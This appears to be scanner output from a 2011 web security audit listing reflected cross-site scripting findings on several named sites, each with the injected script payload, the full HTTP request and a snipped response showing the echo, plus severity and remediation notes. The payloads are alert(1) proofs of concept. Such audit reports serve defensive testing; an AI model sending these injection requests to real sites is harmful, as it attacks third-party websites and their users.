HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 04:05:21 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.3.3 X-Powered-By: PHP/5.3.3 Content-Length: 4526 Connection: close Content-Type: text/html
The value of the first_name request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72a0e"><script>alert(1)</script>9736852f4d7 was submitted in the first_name parameter. This input was echoed as 72a0e\"><script>alert(1)</script>9736852f4d7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /contact/form_support.htm?first_name=72a0e"><script>alert(1)</script>9736852f4d7&last_name=&email=&account= HTTP/1.1 Host: www.sitesearch.omniture.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 04:05:18 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.3.3 X-Powered-By: PHP/5.3.3 Content-Length: 4526 Connection: close Content-Type: text/html
The value of the last_name request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 399d0"><script>alert(1)</script>6520bebc9e8 was submitted in the last_name parameter. This input was echoed as 399d0\"><script>alert(1)</script>6520bebc9e8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /contact/form_support.htm?first_name=&last_name=399d0"><script>alert(1)</script>6520bebc9e8&email=&account= HTTP/1.1 Host: www.sitesearch.omniture.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 04:05:20 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.3.3 X-Powered-By: PHP/5.3.3 Content-Length: 4526 Connection: close Content-Type: text/html
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c92f"><script>alert(1)</script>bd6fb384a18 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /multimedia6c92f"><script>alert(1)</script>bd6fb384a18/50-years-black-history?gt1=38002 HTTP/1.1 Host: www.theroot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.63 (Unix) Last-Modified: Wed, 02 Feb 2011 16:17:57 GMT Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Wed, 02 Feb 2011 16:17:57 GMT Date: Wed, 02 Feb 2011 16:17:57 GMT Content-Length: 15118 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <meta name=" ...[SNIP]... <meta property="og:url" content="http://www.theroot.com/multimedia6c92f"><script>alert(1)</script>bd6fb384a18/50-years-black-history?gt1=38002"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98209"><script>alert(1)</script>e0674eb095a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /multimedia/50-years-black-history98209"><script>alert(1)</script>e0674eb095a?gt1=38002 HTTP/1.1 Host: www.theroot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.0.63 (Unix) Last-Modified: Wed, 02 Feb 2011 16:18:01 GMT Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Wed, 02 Feb 2011 16:18:02 GMT Date: Wed, 02 Feb 2011 16:18:02 GMT Connection: close Connection: Transfer-Encoding Content-Length: 50675
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <meta name=" ...[SNIP]... <meta property="og:url" content="http://www.theroot.com/multimedia/50-years-black-history98209"><script>alert(1)</script>e0674eb095a?gt1=38002"/> ...[SNIP]...
The value of the gt1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d156"><script>alert(1)</script>bf469ccbd18 was submitted in the gt1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /multimedia/50-years-black-history?gt1=380029d156"><script>alert(1)</script>bf469ccbd18 HTTP/1.1 Host: www.theroot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.0.63 (Unix) Last-Modified: Wed, 02 Feb 2011 16:17:50 GMT Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Wed, 02 Feb 2011 16:17:51 GMT Date: Wed, 02 Feb 2011 16:17:51 GMT Connection: close Connection: Transfer-Encoding Content-Length: 96303
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <meta name=" ...[SNIP]... <meta property="og:url" content="http://www.theroot.com/multimedia/50-years-black-history?gt1=380029d156"><script>alert(1)</script>bf469ccbd18"/> ...[SNIP]...
1.486. http://www.theroot.com/multimedia/50-years-black-history [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.theroot.com
Path: /multimedia/50-years-black-history
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b633c"><script>alert(1)</script>497fa5bdff4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /multimedia/50-years-black-history?gt1=38002&b633c"><script>alert(1)</script>497fa5bdff4=1 HTTP/1.1 Host: www.theroot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.0.63 (Unix) Last-Modified: Wed, 02 Feb 2011 16:17:54 GMT Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Wed, 02 Feb 2011 16:17:56 GMT Date: Wed, 02 Feb 2011 16:17:56 GMT Connection: close Connection: Transfer-Encoding Content-Length: 96334
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <meta name=" ...[SNIP]... <meta property="og:url" content="http://www.theroot.com/multimedia/50-years-black-history?gt1=38002&b633c"><script>alert(1)</script>497fa5bdff4=1"/> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2bdb"><script>alert(1)</script>5626f52969 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /viewsb2bdb"><script>alert(1)</script>5626f52969/2011/young-futurists?gt1=38002 HTTP/1.1 Host: www.theroot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.63 (Unix) Last-Modified: Wed, 02 Feb 2011 16:17:57 GMT Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Wed, 02 Feb 2011 16:17:57 GMT Date: Wed, 02 Feb 2011 16:17:57 GMT Content-Length: 15066 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <meta name=" ...[SNIP]... <meta property="og:url" content="http://www.theroot.com/viewsb2bdb"><script>alert(1)</script>5626f52969/2011/young-futurists?gt1=38002"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1745"%3bfde0c798c36 was submitted in the REST URL parameter 2. This input was echoed as e1745";fde0c798c36 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request

GET /views/2011e1745"%3bfde0c798c36/young-futurists?gt1=38002 HTTP/1.1
Host: www.theroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix)
Last-Modified: Wed, 02 Feb 2011 16:18:03 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 02 Feb 2011 16:18:05 GMT
Date: Wed, 02 Feb 2011 16:18:05 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49473
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15823"><script>alert(1)</script>9152561effe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request

GET /views/201115823"><script>alert(1)</script>9152561effe/young-futurists?gt1=38002 HTTP/1.1
Host: www.theroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix)
Last-Modified: Wed, 02 Feb 2011 16:17:59 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 02 Feb 2011 16:18:01 GMT
Date: Wed, 02 Feb 2011 16:18:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49685

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<meta name=" ...[SNIP]...
<meta property="og:url" content="http://www.theroot.com/views/201115823"><script>alert(1)</script>9152561effe/young-futurists?gt1=38002"/>
...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1903c"><script>alert(1)</script>6042e8de7d9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request

GET /views/2011/young-futurists1903c"><script>alert(1)</script>6042e8de7d9?gt1=38002 HTTP/1.1
Host: www.theroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix)
Last-Modified: Wed, 02 Feb 2011 16:18:12 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 02 Feb 2011 16:18:13 GMT
Date: Wed, 02 Feb 2011 16:18:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49637

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<meta name=" ...[SNIP]...
<meta property="og:url" content="http://www.theroot.com/views/2011/young-futurists1903c"><script>alert(1)</script>6042e8de7d9?gt1=38002"/>
...[SNIP]...
The value of the gt1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9263e"><script>alert(1)</script>7ef5e7e7b85 was submitted in the gt1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request

GET /views/2011/young-futurists?gt1=380029263e"><script>alert(1)</script>7ef5e7e7b85 HTTP/1.1
Host: www.theroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix)
Last-Modified: Wed, 02 Feb 2011 16:17:50 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 02 Feb 2011 16:17:51 GMT
Date: Wed, 02 Feb 2011 16:17:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 62036

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<meta name=" ...[SNIP]...
<meta property="og:url" content="http://www.theroot.com/views/2011/young-futurists?gt1=380029263e"><script>alert(1)</script>7ef5e7e7b85"/>
...[SNIP]...
1.492. http://www.theroot.com/views/2011/young-futurists [name of an arbitrarily supplied request parameter]
Summary

Severity: High
Confidence: Certain
Host: http://www.theroot.com
Path: /views/2011/young-futurists
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1cfba"><script>alert(1)</script>c2fd8dd267f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request

GET /views/2011/young-futurists?gt1=38002&1cfba"><script>alert(1)</script>c2fd8dd267f=1 HTTP/1.1
Host: www.theroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix)
Last-Modified: Wed, 02 Feb 2011 16:17:55 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 02 Feb 2011 16:17:56 GMT
Date: Wed, 02 Feb 2011 16:17:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 62067

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<meta name=" ...[SNIP]...
<meta property="og:url" content="http://www.theroot.com/views/2011/young-futurists?gt1=38002&1cfba"><script>alert(1)</script>c2fd8dd267f=1"/>
...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload daeb9"><script>alert(1)</script>f3e0aacca45 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request

GET /viewsdaeb9"><script>alert(1)</script>f3e0aacca45/meet-25-people-who-will-change-our-world?gt1=38002 HTTP/1.1
Host: www.theroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.63 (Unix)
Last-Modified: Wed, 02 Feb 2011 16:17:57 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 02 Feb 2011 16:17:57 GMT
Date: Wed, 02 Feb 2011 16:17:57 GMT
Content-Length: 15186
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<meta name=" ...[SNIP]...
<meta property="og:url" content="http://www.theroot.com/viewsdaeb9"><script>alert(1)</script>f3e0aacca45/meet-25-people-who-will-change-our-world?gt1=38002"/>
...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f68f"%3b6502cd69799 was submitted in the REST URL parameter 2. This input was echoed as 1f68f";6502cd69799 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request

GET /views/meet-25-people-who-will-change-our-world1f68f"%3b6502cd69799?gt1=38002 HTTP/1.1
Host: www.theroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix)
Last-Modified: Wed, 02 Feb 2011 16:18:08 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 02 Feb 2011 16:18:10 GMT
Date: Wed, 02 Feb 2011 16:18:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49659
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 648c7"><script>alert(1)</script>e0cb09e666d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request

GET /views/meet-25-people-who-will-change-our-world648c7"><script>alert(1)</script>e0cb09e666d?gt1=38002 HTTP/1.1
Host: www.theroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix)
Last-Modified: Wed, 02 Feb 2011 16:18:05 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 02 Feb 2011 16:18:06 GMT
Date: Wed, 02 Feb 2011 16:18:06 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49871

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<meta name=" ...[SNIP]...
<meta property="og:url" content="http://www.theroot.com/views/meet-25-people-who-will-change-our-world648c7"><script>alert(1)</script>e0cb09e666d?gt1=38002"/>
...[SNIP]...
The value of the gt1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4e7c"><script>alert(1)</script>6bc14871c67 was submitted in the gt1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request

GET /views/meet-25-people-who-will-change-our-world?gt1=38002e4e7c"><script>alert(1)</script>6bc14871c67 HTTP/1.1
Host: www.theroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix)
Last-Modified: Wed, 02 Feb 2011 16:17:48 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 02 Feb 2011 16:17:49 GMT
Date: Wed, 02 Feb 2011 16:17:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 65972

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<meta name=" ...[SNIP]...
<meta property="og:url" content="http://www.theroot.com/views/meet-25-people-who-will-change-our-world?gt1=38002e4e7c"><script>alert(1)</script>6bc14871c67"/>
...[SNIP]...
1.497. http://www.theroot.com/views/meet-25-people-who-will-change-our-world [name of an arbitrarily supplied request parameter]
Summary

Severity: High
Confidence: Certain
Host: http://www.theroot.com
Path: /views/meet-25-people-who-will-change-our-world
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b4be"><script>alert(1)</script>542e90bad81 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request

GET /views/meet-25-people-who-will-change-our-world?gt1=38002&1b4be"><script>alert(1)</script>542e90bad81=1 HTTP/1.1
Host: www.theroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix)
Last-Modified: Wed, 02 Feb 2011 16:17:52 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 02 Feb 2011 16:17:54 GMT
Date: Wed, 02 Feb 2011 16:17:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 66003

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<meta name=" ...[SNIP]...
<meta property="og:url" content="http://www.theroot.com/views/meet-25-people-who-will-change-our-world?gt1=38002&1b4be"><script>alert(1)</script>542e90bad81=1"/>
...[SNIP]...
1.498. http://www.worldmastiffforum.com/ [name of an arbitrarily supplied request parameter]
Summary

Severity: High
Confidence: Certain
Host: http://www.worldmastiffforum.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d11e2"><script>alert(1)</script>f6a009cb502 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request

GET /?d11e2"><script>alert(1)</script>f6a009cb502=1 HTTP/1.1
Host: www.worldmastiffforum.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5ffdd'-alert(1)-'44731edd2a4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request

GET /imp?Z=160x600&s=429613&_salt=975924496&B=10&u=http%3A%2F%2Fad.harrenmedianetwork.com%2F&r=0 HTTP/1.1
Host: ad.harrenmedianetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=5ffdd'-alert(1)-'44731edd2a4

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:17:59 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Wed, 02 Feb 2011 19:17:59 GMT
Content-Length: 522
Connection: close
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a72ed'-alert(1)-'fb8e70772e6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request

GET /st?ad_type=iframe&ad_size=160x600&section=429613 HTTP/1.1
Host: ad.harrenmedianetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=a72ed'-alert(1)-'fb8e70772e6

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:17:55 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:17:55 GMT
Content-Length: 600
Connection: close
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e7bea'-alert(1)-'540c8b7b243 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request

GET /imp?Z=300x250&s=601669&_salt=1358407199&B=10&u=http%3A%2F%2Fad.scanmedios.com%2F&r=0 HTTP/1.1
Host: ad.scanmedios.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=e7bea'-alert(1)-'540c8b7b243

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:18:03 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Wed, 02 Feb 2011 19:18:03 GMT
Content-Length: 515
Connection: close
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 11978'-alert(1)-'712c5dc792d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request

GET /st?ad_type=iframe&ad_size=300x250&section=601669 HTTP/1.1
Host: ad.scanmedios.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=11978'-alert(1)-'712c5dc792d

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
